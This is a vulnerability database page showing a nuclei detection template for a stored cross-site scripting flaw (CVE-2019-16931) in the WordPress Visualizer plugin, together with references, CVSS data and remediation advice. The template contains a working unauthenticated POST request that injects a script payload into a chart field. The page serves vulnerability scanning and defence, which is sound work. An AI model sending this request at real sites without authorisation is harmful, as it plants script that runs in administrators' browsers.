Lucene search
K

WordPress Visualizer <3.3.1 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

WordPress Visualizer plugin <3.3.1 stored cross-site scripting via WP-JSON AP

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2019-16931
3 Oct 201918:34
cve
Cvelist
CVE-2019-16931
3 Oct 201918:34
cvelist
EUVD
EUVD-2019-7424
7 Oct 202500:30
euvd
NVD
CVE-2019-16931
3 Oct 201919:15
nvd
OpenVAS
WordPress Visualizer Plugin < 3.3.1 Multiple Vulnerabilities
2 Oct 201900:00
openvas
OSV
CVE-2019-16931
3 Oct 201919:15
osv
Prion
Cross site scripting
3 Oct 201919:15
prion
RedhatCVE
CVE-2019-16931
22 May 202504:41
redhatcve
wpexploit
Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
28 Sep 201900:00
wpexploit
WPVulnDB
Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
28 Sep 201900:00
wpvulndb
Rows per page
id: CVE-2019-16931

info:
  name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
    - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
    - https://wpvulndb.com/vulnerabilities/9893
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
    - https://wordpress.org/plugins/visualizer/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-16931
    cwe-id: CWE-79
    epss-score: 0.03342
    epss-percentile: 0.87187
    cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: themeisle
    product: visualizer
    framework: wordpress
  tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan,themeisle,vuln

http:
  - raw:
      - |
        POST /wp-json/visualizer/v1/update-chart HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id": 7, "visualizer-chart-type": "<script>alert(document.domain)</script>"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"success":"Chart updated"}'

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022002232a1c5b3a2fc3dcfa5c6a6c299ef47c817d2d26fd04e9969ae5b75904ebfd022100b2c92d3273c818bd2c571ae78f5e52e6f88a7669f97845794c25459f689c8a85:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.03342
24